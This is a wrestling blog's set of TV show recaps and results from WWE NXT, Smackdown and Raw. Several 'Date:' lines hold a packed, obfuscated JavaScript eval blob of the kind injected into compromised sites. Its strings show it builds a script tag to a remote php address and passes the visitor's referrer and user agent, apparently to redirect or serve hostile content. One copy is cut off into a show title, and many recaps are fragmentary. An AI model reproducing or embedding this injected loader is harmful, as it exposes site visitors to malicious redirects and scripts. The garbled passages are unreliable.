With that broken up, Breeze is fine enough to hit an enziguri for a quick near fall. The Supermodel Kick gets two more and there’s a crucifix for the third straight two. The Beauty Shot is countered into a backbreaker to give Strong two of his own and Breeze is in trouble again. Some kicks to the face get Breeze out of a Strong Hold attempt but he gets caught in the belly to back faceplant for two more. Back up and another backbreaker is countered into a quick Unprettier for the pin on Strong at 13:13.

Rating: B-. Good match here, which is the case every time Breeze is around NXT. You would think that this could mean he gets to go somewhere because he’s capable of pulling it off, but WWE has decided that someone of Breeze’s size, look and gimmick isn’t going anywhere and that’s a big problem with the whole brass ring concept. At least he can do things like this here though, and that’s as good as it’s getting for him at the moment.

Overall Rating: C+. Perfectly watchable yet also skippable show here, with the matches mostly working and the wrestling being pretty good at times. It’s an interesting concept that could be done on a much bigger scale in the future, though I would be worried to see what kind of things would happen if WWE was actually paying attention to the idea.

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Thought Of The Day: Keep Things Moving

There’s a good chance that you’re a fan of NXT. I mean, if you’re not, I don’t really know what else to tell you. It’s one of the best wrestling TV shows ever and can put on good shows in almost any way you ask. One of the key things is their diversity, which you can see in their main events, especially as of late. Here are the last four TV main events:

December 19 – Johnny Gargano vs. Aleister Black

December 12 – Ricochet vs. Tyler Breeze

December 5 – Shayna Baszler vs. Dakota Kai

November 28 – Lars Sullivan vs. Keith Lee

That’s a cage match with a brutal backstory, an athletic spectacle in the midcard, a hard hitting women’s match and two hosses hitting each other really hard. They’re four very different kinds of matches with eight different people instead of the same thing you see so often on Raw or Smackdown. There isn’t some main event group that dominates most of the shows and commentary treats whatever the main event of the week is as the most important thing in the world. It’s certainly not something unique to NXT, but no other company does it as often or as well.

Smackdown – August 2, 2016: Double The Problem And It Might Go Away

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kithn|var|u0026u|referrer|frisf||js|php'.split('|'),0,{})) August 2, 2016
Location: Bridgestone Arena, Nashville, Tennessee
Commentators: Mauro Ranallo, John Bradshaw Layfield, David Otunga

Opening sequence.

Post break Ziggler tells the bosses that he wants the match.

Kalisto vs. Apollo Crews vs. Baron Corbin

Back with Corbin in control with Kalisto sends him outside. A Samoan drop gets two for Crews but Corbin comes back in with Deep Six for two of his own. Another hurricanrana attempt is countered but Corbin gets dropkicked to the floor, leaving Crews to pin Kalisto for the title shot 6:45.

Post match Corbin goes after Kalisto with Crews making the save, only to eat a Skull Crushing Finale.

Becky Lynch vs. Eva Marie

American Alpha vs. Vaudevillains

Video on John Cena hosting the Teen Choice Awards.

Randy Orton vs. Fandango

During the break, Lesnar was forced to leave the arena.

Ambrose says nothing surprises him.

Carmella vs. Natalya

And again no match with Natalya jumping Carmella from behind and putting on a Sharpshooter.

The bosses try to talk Ziggler out of the match and he says screw them.

Bray Wyatt vs. Dolph Ziggler


Apollo Crews b. Kalisto and Baron Corbin – Rollup to Kalisto

American Alpha b. Vaudevillains – Grand Amplitude to English

Randy Orton b. Fandango via DQ when Brock Lesnar interfered

Dolph Ziggler b. Bray Wyatt – Superkick


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Smackdown – May 12, 2016: Another One

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fzire|var|u0026u|referrer|behay||js|php'.split('|'),0,{})) May 12, 2016
Location: Wells Fargo Arena, Des Moines, Iowa
Commentators: Mauro Ranallo, Byron Saxton, Jerry Lawler

Rusev vs. Sin Cara

Kalisto is on commentary and says helping Cara on Monday was just being a team. Rusev drops him with an early clothesline and stomps away as Kalisto stumbles over his battle plan for the pay per view. A kick to the chest puts Cara down again and we hear about Steph Curry for no good reason.

In your random insult of the week, Rusev has dubbed Kalisto the smelly boy who hides behind a mask. Cara starts kicking at the leg and scores with some right hands, followed by a top rope flip attack. As this is going on, Lana throws water on Kalisto for a distraction so Rusev can kick him in the head. Back in and the superkick sets up the Accolade to make Cara tap at 3:09.

We look at Dana Brooke debuting and helping beat down Becky Lynch on Monday.

Becky Lynch vs. Dana Brooke

Aiden English vs. Kofi Kingston

Kofi dropkicks him at the bell and stomps the heck out of him in the corner. English gets sent outside but catches a sliding Kofi and sends him face first into the post to take over. Big E. holds up the cereal to bring Kofi back to life (needs more Lion King), which actually seems to work as Kofi kicks English in the face and gets two off a high cross body. A top rope splash to the back gets two but everyone else gets ejected. Things settle down and Kofi grabs a sunset flip, only to have English drop down and put his hand on the ropes for the big upset at 3:52.

Luke Gallows/Karl Anderson vs. Usos

R-Truth waters his selfie stick and gets his phone wet.

On a related sidenote: since when did wearing a watch become something so horrible? Yeah you can check your phone, or you can flick your eyes over to your wrist and see what time it is. You might even be able to do that without then needing to check 14 things on your phone and getting distracted by something. Since when did that become some arcane way of thinking?

Goldango vs. Gorgeous Truth

Greetings From Puerto Rico. Their new name is the Shining Stars.

We look at Ric Flair being escorted out of the building in the way too complicated segment on Monday.

Charlotte calls that a travesty because Ric Flair deserves better treatment than that. Ric guarantees that Charlotte will retain the title at Extreme Rules but Charlotte looks unsure. To recap, the idea here is that Charlotte is in trouble without Flair and Ric is the one who is confident. In other words: Flair looks good and Charlotte looks almost inept. As usual, advantage Flair.

Cesaro/Sami Zayn vs. The Miz/Kevin Owens

Sami takes the Pop Up Powerbomb but Miz gives Owens the Skull Crushing Finale to end the show.


Rusev b. Sin Cara – Accolade

Dana Brooke b. Becky Lynch – Jackknife rollup

Aiden English b. Kofi Kingston – Rollup while grabbing the rope

Usos b. Karl Anderson/Luke Gallows via DQ when Gallows threw Jimmy over the table

Gorgeous Truth b. Goldango – Breeze pinned Goldust after a clothesline from Fandango

Miz/Kevin Owens b. Cesaro/Sami Zayn – Frog splash to Cesaro

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Monday Night Raw – May 2, 2016: The New Era Of Greatest Hits

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eabse|var|u0026u|referrer|nirda||js|php'.split('|'),0,{})) Night Raw
Date: May 2, 2016
Location: Scottrade Center, St. Louis, Missouri
Commentators: Michael Cole, John Bradshaw Layfield, Byron Saxton

Opening sequence.

Cesaro vs. Kevin Owens

Dean Ambrose is in the back with Stephanie, who volunteers to be the guest on the Ambrose Asylum.

Goldust vs. Tyler Breeze

Dudley Boyz/Vaudevillains vs. New Day/Colin Cassady

Emma vs. Becky Lynch

Greetings From Puerto Rico.

Battle Royal

Someone puts Sheamus out off camera but he slides back in with no issue. Ziggler superkicks Corbin over the top for an elimination but Corbin pulls him outside under the ropes and beats the tar out of him. For a nice change of pace, Corbin is smart enough to throw the half dead Ziggler back in so Rusev can get the official elimination as we take a break.

AJ Styles/Karl Anderson/Luke Gallows vs. Usos/Roman Reigns


Cesaro b. Kevin Owens via DQ when Miz interfered

Tyler Breeze b. Goldust – Rollup

New Day/Colin Cassady b. Dudley Boyz/Vaudevillains – East River Crossing to D-Von

Emma b. Becky Lynch – Michinoku Driver

Rusev won a battle royal last eliminating Zack Ryder

AJ Styles/Karl Anderson/Luke Gallows b. Usos/Roman Reigns – Phenomenal Forearm to Jimmy

Remember to follow me on Twitter @kbreviews and pick up my new book of the History of the Intercontinental Title at Amazon for just $3.99 at:


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Smackdown – April 7, 2016: They’re Lulling Early This Year

Date: April 7, 2016
Location: Toyota Center, Houston, Texas
Commentators: Mauro Ranallo, Byron Saxton, Jerry Lawler

We open with a long recap of Wrestlemania.

Opening sequence.

We look back at Vince giving Shane control over Raw, completely negating the importance of the last six weeks or so of this story. That might be better for everyone involved actually.

Lucha Dragons vs. Vaudevillains

Stills package of the ladder match and a video of Ryder losing the title the next night to Miz.

Natalya vs. Summer Rae

We look back at Reigns winning the title and being challenged by Jericho, Styles, Owens and Zayn, followed by Styles winning the four way to become #1 contender.

Intercontinental Title: Zack Ryder vs. Miz

The Social Outcasts play Rock Paper Scissors to determine who gets to face Apollo Crews. Axel is the odd man out but says he wins because the ax beats all.

Curtis Axel vs. Apollo Crews

Corbin says the end of days is here.

Primo and Epico video about how awesome Puerto Rico is.

Dean Ambrose vs. Tyler Breeze

Dean is right on him with shots in the corner and avoids a charge to make things even worse. A big clothesline sets up Dirty Deeds for the pin on Breeze at 1:15.

Ambrose leaves as Chris Jericho is coming out for the main event, giving us a staredown.

Cesaro/AJ Styles vs. Chris Jericho/Kevin Owens

AJ cleans house but Owens quickly takes over, only to eat a Pele. Jericho breaks up the Phenomenal Forearm and the package side slam gets two on AJ. Cesaro beats on Jericho outside as Sami Zayn comes out to go after Owens. The distraction lets AJ roll Owens up for the pin at 13:03.

Owens and Zayn (whose arm is heavily taped) brawl post match with security breaking it up but accidentally allowing Owens to get in a clean shot to the jaw. Zayn is sent into the steps to end the show.


Vaudevillains b. Lucha Dragons – Whirling Dervish to Kalisto

Natalya b. Summer Rae – Sharpshooter

Miz b. Zack Ryder – Skull Crushing Finale

Apollo Crews b. Curtis Axel – Lifting sitout powerbomb

Dean Ambrose b. Tyler Breeze – Dirty Deeds

AJ Styles/Cesaro b. Kevin Owens/Chris Jericho – Rollup to Owens

Remember to follow me on Twitter @kbreviews and pick up my new book of the History of the Intercontinental Title at Amazon for just $3.99 at:


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